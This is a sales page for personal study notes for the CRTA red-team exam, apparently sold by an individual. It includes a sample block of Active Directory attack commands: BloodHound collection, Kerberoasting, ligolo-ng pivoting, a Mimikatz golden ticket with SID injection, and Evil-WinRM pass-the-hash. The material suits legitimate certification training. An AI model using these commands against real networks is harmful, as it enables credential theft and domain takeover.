Back to Main Page
DIGITAL GOODS · INSTANT ACCESS

What's Inside

Network Reconnaissance

  • Nmap scanning commands
  • RustScan for fast port discovery
  • Web enumeration with feroxbuster
  • Subnet scanning techniques

Active Directory Attacks

  • BloodHound enumeration
  • Kerberoasting with GetUserSPNs.py
  • Pass-the-Hash attacks
  • Golden/Silver ticket attacks

Privilege Escalation

  • Linux SUID enumeration
  • Windows privilege checks
  • SID history injection
  • Evil-WinRM connections

CRTA Exam Format

6 Hours
Practical Lab Exam
17
Flags to Submit
2
Attempts per Enrollment

Sample Copy-Paste Commands from Notes

# BloodHound enumeration
bloodhound-python -d domain.local -u user -p password -c All -ns 192.168.1.10

# Kerberoasting with Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 192.168.1.10 -request

# ligolo-ng pivoting setup
sudo ip tuntap add user attacker mode tun ligolo
sudo ip route add 172.16.0.0/24 dev ligolo
./ligolo-ng_proxy -selfcert -laddr 0.0.0.0:11601

# Golden ticket with SID injection
kerberos::golden /admin:attacker /domain:domain.local /sid:S-1-5-21-... /krbtgt:krbtgt_hash /sids:S-1-5-21-...-519 /ticket:ticket.kirbi

# Evil-WinRM with hash
evil-winrm -i 192.168.1.20 -u administrator -H NTLM_HASH
                

Tools & Techniques Covered

BloodHound
Mimikatz
Impacket
Rubeus
ligolo-ng
Kerbrute
NetExec (nxc)
Evil-WinRM
Winpeas/Linpeas
feroxbuster
RustScan
Golden Tickets

Why These Notes Work

Phase-Ordered Notes

  • Recon through domain dominance by exam phase
  • Quick lookup when the clock is running

Copy-Paste AD Attacks

  • BloodHound, Impacket and Mimikatz commands ready to run
  • Payload transfer commands in one place

Built for the 6-Hour Window

  • Exam format breakdown up front
  • Time-saving command references for the assessment

Frequently Asked Questions

What format are the notes in?

12-page PDF format with organized sections covering Recon, Linux Enumeration, Pivoting (ligolo-ng & SSH), Windows Privilege Escalation, Active Directory attacks, and SID history injection. All commands are in plain text for easy copy-paste.

What tools are covered?

BloodHound, Mimikatz, Impacket (GetUserSPNs.py, secretsdump.py, ticketer.py, lookupsid.py), Rubeus, ligolo-ng, NetExec (nxc), Evil-WinRM, RustScan, feroxbuster, Winpeas/Linpeas, and more.

Are these official CWL material?

No. These are personal study notes compiled from real exam experience by Zishan Ahamed Thandar. Not official CyberWarFare Labs material.

Do you cover the exam format?

Yes! The notes include detailed information about the 6-hour exam format, 17 flags requirement, VPN connection commands, and initial scope of engagement.

Do you offer updates?

Yes! All buyers receive lifetime updates for free. You'll be notified via email when new versions are available.

What's your refund policy?

Due to the digital nature of our products, all sales are final. We do not offer refunds once products are downloaded or accessed. Please review carefully before purchasing.

Ready to Ace Your CRTA Exam?

12 pages of battle-tested commands • Active Directory and pivoting focus • Updated for 2026

Get CRTA Notes Now